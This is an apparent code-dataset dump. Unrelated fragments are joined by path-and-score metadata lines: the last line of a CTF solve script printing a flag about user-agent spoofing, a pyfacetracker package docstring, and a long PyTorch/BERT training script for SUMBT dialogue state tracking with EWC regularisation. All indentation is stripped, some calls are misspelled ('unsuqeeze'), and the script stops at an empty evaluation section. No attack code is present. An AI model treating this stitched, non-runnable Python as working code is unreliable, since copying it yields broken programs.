print(r.text)
# darkCTF{changeing_http_user_agent_is_easy} | 2.421875 | 2 |
facetracker/__init__.py | amitibo/pyfacetracker | 2 | 12796177 | """
pyfacetracker: Python wrapper for FaceTracker.
==============================================
FaceTracker is a library for deformable face tracking written in C++ using
OpenCV 2, authored by <NAME> and maintained by <NAME>. It is
available free for non-commercial use, and may be redistributed under these
conditions. Please see the LICENSE file for complete details.
**pyfacetracker** is a thin wrapper around FaceTracker. It enables using
FaceTracker while enjoyging the comfort of the Python scripting language.
pyfacetracker is available under the BSD License. This has no effect on
Jason's code, which is available under a separate license.
pyfacetracker is copyright (C) 2012 by <NAME>
.. codeauthor:: <NAME> <<EMAIL>>
"""
from _facetracker import * | 1.445313 | 1 |
code/main-multislot-ewc.py | gungui98/sumbt | 99 | 12796178 | import csv
import os
import logging
import argparse
import random
import collections
import operator
from tqdm import tqdm, trange
import numpy as np
import torch
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
from torch.utils.data.distributed import DistributedSampler
from pytorch_pretrained_bert.tokenization import BertTokenizer
from pytorch_pretrained_bert.optimization import BertAdam
from tensorboardX import SummaryWriter
import pdb
import matplotlib.pyplot as plt
import seaborn
seaborn.set_context(context="talk")
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO)
logger = logging.getLogger(__name__)
###############################################################################
# Data Preprocessing
###############################################################################
class InputExample(object):
"""A single training/test example for simple sequence classification."""
def __init__(self, guid, text_a, text_b=None, label=None, prev_label=None):
self.guid = guid
self.text_a = text_a
self.text_b = text_b
self.label = label # Target slots in this training task
self.prev_label = prev_label # trained slots in previous tasks
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, input_ids, input_len, label_id, prev_label_id):
self.input_ids = input_ids
self.input_len = input_len
self.label_id = label_id
self.prev_label_id = prev_label_id # trained slots in previous tasks
class DataProcessor(object):
"""Base class for data converters for sequence classification data sets."""
def get_train_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the train set."""
raise NotImplementedError()
def get_dev_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the dev set."""
raise NotImplementedError()
def get_labels(self):
"""Gets the list of labels for this data set."""
raise NotImplementedError()
@classmethod
def _read_tsv(cls, input_file, quotechar=None):
"""Reads a tab separated value file."""
with open(input_file, "r", encoding='utf-8') as f:
reader = csv.reader(f, delimiter="\t", quotechar=quotechar)
lines = []
for line in reader:
if len(line) > 0 and line[0][0] == '#': # ignore comments (starting with '#')
continue
lines.append(line)
return lines
class Processor(DataProcessor):
"""Processor for the belief tracking dataset (GLUE version)."""
def __init__(self, config):
super(Processor, self).__init__()
import json
if config.data_dir == "data/woz" or config.data_dir=="data/woz-turn":
fp_ontology = open(os.path.join(config.data_dir, "ontology_dstc2_en.json"), "r")
ontology = json.load(fp_ontology)
ontology = ontology["informable"]
del ontology["request"]
for slot in ontology.keys():
ontology[slot].append("do not care")
ontology[slot].append("none")
fp_ontology.close()
elif config.data_dir == "data/multiwoz":
fp_ontology = open(os.path.join(config.data_dir, "ontology.json"), "r")
ontology = json.load(fp_ontology)
for slot in ontology.keys():
ontology[slot].append("none")
fp_ontology.close()
if not config.target_slot == 'all':
slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\
'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'}
target_slot =[]
prev_slot = []
for key, value in slot_idx.items():
if key == config.target_slot:
target_slot.append(value)
else:
prev_slot.append(value)
config.target_slot = ':'.join(target_slot)
config.prev_slot = ':'.join(prev_slot)
else:
raise NotImplementedError()
# sorting the ontology according to the alphabetic order of the slots
self.ontology = collections.OrderedDict(sorted(ontology.items()))
# select slots to train
self.target_slot = []
self.prev_slot = []
self.target_slot_idx = sorted([ int(x) for x in config.target_slot.split(':')])
self.prev_slot_idx = sorted([ int(x) for x in config.prev_slot.split(':')])
ontology_items = list(self.ontology.items())
for idx, domain in enumerate(ontology_items):
slot, value = domain
if slot == "pricerange":
slot = "price range"
if idx in self.target_slot_idx:
self.target_slot.append(slot)
elif idx in self.prev_slot_idx:
self.prev_slot.append(slot)
self.all_slot = self.prev_slot + self.target_slot
logger.info('Processor: previous slots: ' + ', '.join(self.prev_slot))
logger.info('Processor: target slots: '+ ', '.join(self.target_slot))
def get_train_examples(self, data_dir, accumulation=False):
"""See base class."""
return self._create_examples(
self._read_tsv(os.path.join(data_dir, "train.tsv")), "train", accumulation)
def get_dev_examples(self, data_dir, accumulation=False):
"""See base class."""
return self._create_examples(
self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev", accumulation)
def get_test_examples(self, data_dir, accumulation=False):
"""See base class."""
return self._create_examples(
self._read_tsv(os.path.join(data_dir, "test.tsv")), "test", accumulation)
def get_labels(self):
"""See base class."""
return [ self.ontology[slot] for slot in self.target_slot]
def get_prev_labels(self):
"""See base class."""
return [ self.ontology[slot] for slot in self.prev_slot]
def _create_examples(self, lines, set_type, accumulation=False):
"""Creates examples for the training and dev sets."""
prev_dialogue_index = None
examples = []
for (i, line) in enumerate(lines):
guid = "%s-%s-%s" % (set_type, line[0], line[1]) # line[0]: dialogue index, line[1]: turn index
if accumulation:
if prev_dialogue_index is None or prev_dialogue_index != line[0]:
text_a = line[2]
text_b = line[3]
prev_dialogue_index = line[0]
else:
# The symbol '#' will be replaced with '[SEP]' after tokenization.
text_a = line[2] + " # " + text_a
text_b = line[3] + " # " + text_b
else:
text_a = line[2] # line[2]: user utterance
text_b = line[3] # line[3]: system response
label = [ line[4+idx] for idx in self.target_slot_idx]
prev_label = [ line[4+idx] for idx in self.prev_slot_idx]
examples.append(
InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, prev_label=prev_label))
return examples
def convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length, tokenizer, max_turn_length):
"""Loads a data file into a list of `InputBatch`s."""
slot_dim = len(label_list)
prev_slot_dim = len(prev_label_list)
def _hard_coding_label(label):
return 'do not care' if label=='dontcare' else label
def _get_label(label, label_list):
label_id = []
label_info = ''
label_map = [{_label: i for i, _label in enumerate(labels)} for labels in label_list]
for i, label in enumerate(label):
label = _hard_coding_label(label)
label_id.append(label_map[i][label])
label_info += '%s (id = %d) ' % (label, label_map[i][label])
return label_id, label_info
features = []
prev_dialogue_idx = None
all_padding = [0] * max_seq_length
all_padding_len = [0, 0]
max_turn = 0
for (ex_index, example) in enumerate(examples):
if max_turn < int(example.guid.split('-')[2]):
max_turn = int(example.guid.split('-')[2])
max_turn_length = min(max_turn+1, max_turn_length)
logger.info("max_turn_length = %d" % max_turn)
for (ex_index, example) in enumerate(examples):
tokens_a = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)]
tokens_b = None
if example.text_b:
tokens_b = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)]
_truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)
else:
# Account for [CLS] and [SEP] with "- 2"
if len(tokens_a) > max_seq_length - 2:
tokens_a = tokens_a[:(max_seq_length - 2)]
tokens = ["[CLS]"] + tokens_a + ["[SEP]"]
input_len = [len(tokens), 0]
if tokens_b:
tokens += tokens_b + ["[SEP]"]
input_len[1] = len(tokens_b) + 1
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# Zero-pad up to the sequence length.
input_ids += [0] * (max_seq_length - len(input_ids)) # Note: padding idx = 0
assert len(input_ids) == max_seq_length
label_id, label_info = _get_label(example.label, label_list)
prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list)
if ex_index < 5:
logger.info("*** Example ***")
logger.info("guid: %s" % example.guid)
logger.info("tokens: %s" % " ".join([str(x) for x in tokens]))
logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
logger.info("input_len: %s" % " ".join([str(x) for x in input_len]))
logger.info("label: " + label_info)
logger.info("previous label: " + prev_label_info)
curr_dialogue_idx = example.guid.split('-')[1]
curr_turn_idx = int(example.guid.split('-')[2])
if (prev_dialogue_idx is not None) and (prev_dialogue_idx != curr_dialogue_idx):
if prev_turn_idx < max_turn_length:
features += [InputFeatures(input_ids=all_padding,
input_len=all_padding_len,
label_id=[-1]*slot_dim,
prev_label_id=[-1] * prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1)
assert len(features) % max_turn_length == 0
if prev_dialogue_idx is None or prev_turn_idx < max_turn_length:
features.append(InputFeatures(input_ids=input_ids,
input_len=input_len,
label_id=label_id,
prev_label_id=prev_label_id,
))
prev_dialogue_idx = curr_dialogue_idx
prev_turn_idx = curr_turn_idx
if prev_turn_idx < max_turn_length:
features += [InputFeatures(input_ids=all_padding,
input_len=all_padding_len,
label_id=[-1]*slot_dim,
prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1)
assert len(features) % max_turn_length == 0
all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
all_input_len= torch.tensor([f.input_len for f in features], dtype=torch.long)
all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)
all_prev_label_ids = torch.tensor([f.prev_label_id for f in features], dtype=torch.long)
# reshape tensors to [batch, turn, word]
all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length)
all_input_len = all_input_len.view(-1, max_turn_length, 2)
all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim)
all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim)
return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids
def get_label_embedding(labels, max_seq_length, tokenizer, device):
features = []
for label in labels:
label_tokens = ["[CLS]"] + tokenizer.tokenize(label) + ["[SEP]"]
label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens)
label_len = len(label_token_ids)
label_padding = [0] * (max_seq_length - len(label_token_ids))
label_token_ids += label_padding
assert len(label_token_ids) == max_seq_length
features.append((label_token_ids, label_len))
all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device)
all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device)
return all_label_token_ids, all_label_len
def _truncate_seq_pair(tokens_a, tokens_b, max_length):
"""Truncates a sequence pair in place to the maximum length."""
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
###############################################################################
# Miscellaneous functions
###############################################################################
def accuracy(out, labels):
outputs = np.argmax(out, axis=1)
return np.sum(outputs == labels)
def warmup_linear(x, warmup=0.002):
if x < warmup:
return x / warmup
return 1.0 - x
###############################################################################
# Main
###############################################################################
def main():
parser = argparse.ArgumentParser()
## Required parameters
parser.add_argument('--data_dir', type=str, required=True,
help='location of the data corpus')
parser.add_argument("--bert_model", default=None, type=str, required=True,
help="Bert pre-trained model selected in the list: bert-base-uncased, "
"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, "
"bert-base-multilingual-cased, bert-base-chinese.")
parser.add_argument("--bert_dir", default='/gfs/nlp/.pytorch_pretrained_bert',
type=str, required=False,
help="The directory of the pretrained BERT model")
parser.add_argument("--task_name", default=None, type=str, required=True,
help="The name of the task to train: bert, bert-gru, bert-lstm, "
"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument('--load_path', type=str, default='',
help='pretrained model directory name')
parser.add_argument("--target_slot", default='', type=str, required=True,
help="Target slot idx to train model. ex. '0:1:2 or an excluding slot name 'attraction'" )
parser.add_argument("--prev_slot", default='', type=str, required=True,
help="Previous trained slots. ex. '0:1:2 or an excluding slot name 'attraction'" )
parser.add_argument("--tf_dir", default='tensorboard', type=str, required=False,
help="Tensorboard directory")
parser.add_argument("--nbt", default='rnn', type=str, required=True,
help="nbt type: rnn or transformer or turn" )
parser.add_argument("--fix_utterance_encoder",
action='store_true',
help="Do not train BERT utterance encoder")
## Other parameters
parser.add_argument("--max_seq_length", default=64, type=int,
help="The maximum total input sequence length after WordPiece tokenization. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
parser.add_argument("--max_label_length", default=32, type=int,
help="The maximum total input sequence length after WordPiece tokenization. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
parser.add_argument("--max_turn_length", default=22, type=int,
help="The maximum total input turn length. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
parser.add_argument('--hidden_dim',
type=int,
default=100,
help="hidden dimension used in belief tracker")
parser.add_argument('--num_rnn_layers',
type=int,
default=1,
help="number of RNN layers")
parser.add_argument('--zero_init_rnn',
action='store_true',
help="set initial hidden of rnns zero")
parser.add_argument('--skip_connect',
type=str,
default=False,
help="skip-connection")
parser.add_argument('--attn_head',
type=int,
default=4,
help="the number of heads in multi-headed attention")
parser.add_argument("--do_train",
action='store_true',
help="Whether to run training.")
parser.add_argument("--do_eval",
action='store_true',
help="Whether to run eval on the test set.")
parser.add_argument("--do_analyze",
action='store_true',
help="Whether to run analysis on the test set.")
parser.add_argument("--do_lower_case",
action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--set_label_encoder_trainable",
action='store_true',
help="Set this flag if you want to set the label encoder trainable. \n"
"This option is valid only when using label embeddings. \n")
parser.add_argument("--distance_metric",
type=str,
default="cosine",
help="The metric for distance between label embeddings: cosine, euclidean.")
parser.add_argument("--train_batch_size",
default=4,
type=int,
help="Total batch size for training.")
parser.add_argument("--dev_batch_size",
default=1,
type=int,
help="Total batch size for validation.")
parser.add_argument("--eval_batch_size",
default=16,
type=int,
help="Total batch size for eval.")
parser.add_argument("--learning_rate",
default=5e-5,
type=float,
help="The initial learning rate for Adam.")
parser.add_argument("--num_train_epochs",
default=3.0,
type=float,
help="Total number of training epochs to perform.")
parser.add_argument("--patience",
default=10.0,
type=float,
help="The number of epochs to allow no further improvement.")
parser.add_argument("--warmup_proportion",
default=0.1,
type=float,
help="Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10%% of training.")
parser.add_argument("--lambda_ewc",
default=0.1,
type=float,
help="Hyper-parameter for EWC")
parser.add_argument("--no_cuda",
action='store_true',
help="Whether not to use CUDA when available")
parser.add_argument("--local_rank",
type=int,
default=-1,
help="local_rank for distributed training on gpus")
parser.add_argument('--seed',
type=int,
default=42,
help="random seed for initialization")
parser.add_argument('--gradient_accumulation_steps',
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.")
parser.add_argument('--fp16',
action='store_true',
help="Whether to use 16-bit float precision instead of 32-bit")
parser.add_argument('--loss_scale',
type=float, default=0,
help="Loss scaling to improve fp16 numeric stability. Only used when fp16 set to True.\n"
"0 (default value): dynamic loss scaling.\n"
"Positive power of 2: static loss scaling value.\n")
parser.add_argument("--do_not_use_tensorboard",
action='store_true',
help="Whether to run eval on the test set.")
args = parser.parse_args()
if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train:
raise ValueError("Output directory ({}) already exists and is not empty.".format(args.output_dir))
os.makedirs(args.output_dir, exist_ok=True)
task_name = args.task_name.lower()
tb_file_name = args.output_dir.split('/')[1]
# Tensorboard logging
if not args.do_not_use_tensorboard:
summary_writer = SummaryWriter("./%s/%s" % (args.tf_dir, tb_file_name))
else:
summary_writer = None
fileHandler = logging.FileHandler(os.path.join(args.output_dir, "%s.txt"%(tb_file_name)))
logger.addHandler(fileHandler)
logger.info(args)
# CUDA setting
if args.local_rank == -1 or args.no_cuda:
device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
n_gpu = torch.cuda.device_count()
else:
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
n_gpu = 1
# Initializes the distributed backend which will take care of sychronizing nodes/GPUs
torch.distributed.init_process_group(backend='nccl')
logger.info("device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}".format(
device, n_gpu, bool(args.local_rank != -1), args.fp16))
if args.gradient_accumulation_steps < 1:
raise ValueError("Invalid gradient_accumulation_steps parameter: {}, should be >= 1".format(
args.gradient_accumulation_steps))
args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps)
# Set the random seed manually for reproducibility.
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
if not args.do_train and not args.do_eval and not args.do_analyze:
raise ValueError("At least one of `do_train` or `do_eval` must be True.")
###############################################################################
# Load data
###############################################################################
# Get Processor
processor = Processor(args)
prev_label_list = processor.get_prev_labels() # Slot value labels of Previous task
target_label_list = processor.get_labels() # Slot value labels of Present task
label_list = prev_label_list + target_label_list # All slot value labels
num_labels = [len(labels) for labels in label_list] # Number of labels of all slots
#prev_slot_id = processor.prev_slot_idx
#target_slot_id = processor.target_slot_idx
# wrong
prev_slot_id = list(range(0, len(processor.prev_slot))) # List of slots in previous task
target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot))) # list of slots in present task
# tokenizer
vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model)
if not os.path.exists(vocab_dir):
raise ValueError("Can't find %s " % vocab_dir)
tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case)
num_train_steps = None
accumulation = False
if args.do_train:
train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation)
dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation)
num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs)
num_dev_steps = int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs)
## utterances
all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features(
train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length)
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_examples))
logger.info(" Batch size = %d", args.train_batch_size)
logger.info(" Num steps = %d", num_train_steps)
all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \
= all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device)
train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids)
if args.local_rank == -1:
train_sampler = RandomSampler(train_data)
else:
train_sampler = DistributedSampler(train_data)
train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)
## Dev
## utterances
all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features(
dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length)
logger.info("***** Running validation *****")
logger.info(" Num examples = %d", len(dev_examples))
logger.info(" Batch size = %d", args.dev_batch_size)
logger.info(" Num steps = %d", num_dev_steps)
all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \
all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device)
dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev)
dev_sampler = SequentialSampler(dev_data)
dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size)
logger.info("Loaded data!")
###############################################################################
# Build the models
###############################################################################
# Prepare model
if args.nbt =='rnn':
from BeliefTrackerSlotQueryMultiSlot import BeliefTracker
if args.task_name.find("gru") == -1 and args.task_name.find("lstm") == -1:
raise ValueError("Task name should include at least \"gru\" or \"lstm\"")
elif args.nbt =='turn':
from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker
elif args.nbt == 'transformer':
from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker
from BeliefTrackerSlotQueryMultiSlotEWC import EWC
else:
raise ValueError('nbt type should be either rnn or transformer')
from BeliefTrackerSlotQueryMultiSlotEWC import EWC
model = BeliefTracker(args, num_labels, device)
if args.fp16:
model.half()
# Load pretrained model
# in the case that slot and values are different between the training and evaluation
ptr_model = torch.load(args.load_path, map_location=device)
del_list = []
rename_list = []
for key in ptr_model.keys():
if ('slot_lookup' in key) or ('value_lookup' in key): # remove slot_lookup and value_lookup
del_list.append(key)
if ('rnn.' in key): # rename rnn -> nbt,
rename_list.append(key)
for key in del_list:
del ptr_model[key]
for key in rename_list:
new_key = key.replace('rnn.', 'nbt.')
ptr_model[new_key] = ptr_model[key]
del ptr_model[key]
state = model.state_dict()
state.update(ptr_model)
model.load_state_dict(state)
model.to(device)
## Get slot-value embeddings
label_token_ids, label_len = [], []
for labels in label_list:
token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device)
label_token_ids.append(token_ids)
label_len.append(lens)
## Get slot-type embeddings
## Note: slot embeddings are ordered as [previous slots + present target slots]
slot_token_ids, slot_len = \
get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device)
model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len)
if args.local_rank != -1:
try:
from apex.parallel import DistributedDataParallel as DDP
except ImportError:
raise ImportError(
"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
model = DDP(model)
elif n_gpu > 1:
model = torch.nn.DataParallel(model)
# Prepare optimizer
if args.do_train:
def get_optimizer_grouped_parameters(model):
param_optimizer = [(n, p) for n, p in model.named_parameters() if p.requires_grad]
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01,
'lr': args.learning_rate},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0,
'lr': args.learning_rate},
]
return optimizer_grouped_parameters
if n_gpu == 1:
optimizer_grouped_parameters = get_optimizer_grouped_parameters(model)
else:
optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module)
t_total = num_train_steps
if args.local_rank != -1:
t_total = t_total // torch.distributed.get_world_size()
if args.fp16:
try:
from apex.optimizers import FP16_Optimizer
from apex.optimizers import FusedAdam
except ImportError:
raise ImportError(
"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
optimizer = FusedAdam(optimizer_grouped_parameters,
lr=args.learning_rate,
bias_correction=False,
max_grad_norm=1.0)
if args.loss_scale == 0:
optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)
else:
optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)
else:
optimizer = BertAdam(optimizer_grouped_parameters,
lr=args.learning_rate,
warmup=args.warmup_proportion,
t_total=t_total)
logger.info(optimizer)
###############################################################################
# Training code
###############################################################################
if args.do_train:
logger.info("Training...")
global_step = 0
last_update = None
best_loss = None
#### EWC: calculate Fisher
ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu)
for epoch in trange(int(args.num_train_epochs), desc="Epoch"):
# for epoch in trange(1):
#### TRAIN
model.train()
tr_loss = 0
nb_tr_examples, nb_tr_steps = 0, 0
for step, batch in enumerate(tqdm(train_dataloader, desc="Iteration")):
batch = tuple(t.to(device) for t in batch)
input_ids, input_len, label_ids, _ = batch
if n_gpu == 1:
loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)
loss_ewc = ewc.penalty(model)
loss = loss_ + args.lambda_ewc * loss_ewc
else:
loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
target_slot=target_slot_id)
loss_ = loss_.mean()
acc = acc.mean()
acc_slot = acc_slot.mean(0)
loss_ewc = ewc.penalty(model)
loss = loss_ + args.lambda_ewc * loss_ewc
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
if args.fp16:
optimizer.backward(loss)
else:
loss.backward()
if summary_writer is not None:
summary_writer.add_scalar("Epoch", epoch, global_step)
summary_writer.add_scalar("Train/Loss", loss_, global_step)
summary_writer.add_scalar("Train/Loss_EWC", loss_ewc, global_step)
summary_writer.add_scalar("Train/Loss_Total", loss, global_step)
summary_writer.add_scalar("Train/JointAcc", acc, global_step)
if n_gpu == 1:
for i, slot in enumerate(processor.target_slot):
summary_writer.add_scalar("Train/Loss_%s" % slot.replace(' ','_'), loss_slot[i], global_step)
summary_writer.add_scalar("Train/Acc_%s" % slot.replace(' ','_'), acc_slot[i], global_step)
tr_loss += loss.item()
nb_tr_examples += input_ids.size(0)
nb_tr_steps += 1
if (step + 1) % args.gradient_accumulation_steps == 0:
# modify learning rate with special warm up BERT uses
lr_this_step = args.learning_rate * warmup_linear(global_step / t_total, args.warmup_proportion)
if summary_writer is not None:
summary_writer.add_scalar("Train/LearningRate", lr_this_step, global_step)
for param_group in optimizer.param_groups:
param_group['lr'] = lr_this_step
optimizer.step()
optimizer.zero_grad()
global_step += 1
# Perform evaluation on validation dataset
model.eval()
dev_loss = 0
dev_acc = 0
dev_loss_slot, dev_acc_slot = None, None
nb_dev_examples, nb_dev_steps = 0, 0
prev_dev_loss = 0
prev_dev_acc = 0
prev_dev_loss_slot, prev_dev_acc_slot = None, None
prev_nb_dev_examples = 0
for step, batch in enumerate(tqdm(dev_dataloader, desc="Validation")):
batch = tuple(t.to(device) for t in batch)
input_ids, input_len, label_ids, prev_label_ids = batch
if input_ids.dim() == 2:
input_ids = input_ids.unsqueeze(0)
input_len = input_len.unsqueeze(0)
label_ids = label_ids.unsuqeeze(0)
prev_label_ids = prev_label_ids.unsuqeeze(0)
with torch.no_grad():
if n_gpu == 1:
loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
target_slot=target_slot_id)
loss = loss_ + args.lambda_ewc * ewc.penalty(model)
prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len,
prev_label_ids, n_gpu,
target_slot=prev_slot_id)
else:
loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)
loss_ = loss_.mean()
acc = acc.mean()
acc_slot = acc_slot.mean(0)
loss_ewc = ewc.penalty(model)
loss = loss_ + args.lambda_ewc * loss_ewc
prev_loss, _, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
prev_loss = prev_loss.mean()
prev_acc = prev_acc.mean()
prev_acc_slot = prev_acc_slot.mean(0)
num_valid_turn = torch.sum(label_ids[:,:,0].view(-1) > -1, 0).item()
dev_loss += loss.item() * num_valid_turn
dev_acc += acc.item() * num_valid_turn
prev_num_valid_turn = torch.sum(prev_label_ids[:,:,0].view(-1) > -1, 0).item()
prev_dev_loss += prev_loss.item() * prev_num_valid_turn
prev_dev_acc += prev_acc.item() * prev_num_valid_turn
if n_gpu == 1:
if dev_loss_slot is None:
dev_loss_slot = [ l * num_valid_turn for l in loss_slot]
dev_acc_slot = acc_slot * num_valid_turn
prev_dev_loss_slot = [ l * prev_num_valid_turn for l in prev_loss_slot]
prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn
else:
for i, l in enumerate(loss_slot):
dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn
dev_acc_slot += acc_slot * num_valid_turn
for i, l in enumerate(prev_loss_slot):
prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn
prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn
nb_dev_examples += num_valid_turn
prev_nb_dev_examples += prev_num_valid_turn
dev_loss = dev_loss / nb_dev_examples
dev_acc = dev_acc / nb_dev_examples
prev_dev_loss = prev_dev_loss / prev_nb_dev_examples
prev_dev_acc = prev_dev_acc / prev_nb_dev_examples
if n_gpu == 1:
dev_acc_slot = dev_acc_slot / nb_dev_examples
prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples
if summary_writer is not None:
summary_writer.add_scalar("Validate/Loss", dev_loss, global_step)
summary_writer.add_scalar("Validate/Acc", dev_acc, global_step)
summary_writer.add_scalar("Validate/Prev_Loss", prev_dev_loss, global_step)
summary_writer.add_scalar("Validate/Prev_Acc", prev_dev_acc, global_step)
if n_gpu == 1:
for i, slot in enumerate(processor.target_slot):
summary_writer.add_scalar("Validate/Loss_%s" % slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step)
summary_writer.add_scalar("Validate/Acc_%s" % slot.replace(' ','_'), dev_acc_slot[i], global_step)
for i, slot in enumerate(processor.prev_slot):
summary_writer.add_scalar("Validate/Prev_Loss_%s" % slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step)
summary_writer.add_scalar("Validate/Prev_Acc_%s" % slot.replace(' ','_'), prev_dev_acc_slot[i], global_step)
logger.info("*** Model Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, Valid prev loss=%.6f, Valid prev acc=%.6f ***" \
% (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc))
dev_loss = round(dev_loss, 6)
if last_update is None or dev_loss < best_loss:
# Save a trained model
output_model_file = os.path.join(args.output_dir, "pytorch_model.bin")
if args.do_train:
if n_gpu == 1:
torch.save(model.state_dict(), output_model_file)
else:
torch.save(model.module.state_dict(), output_model_file)
last_update = epoch
best_loss = dev_loss
best_acc = dev_acc
logger.info("*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***" % (last_update, best_loss, best_acc))
else:
logger.info("*** Model NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***" % (epoch, dev_loss, dev_acc))
#if epoch > 100 and last_update + args.patience <= epoch:
if last_update + args.patience <= epoch:
break
###############################################################################
# Evaluation
###############################################################################
# Test
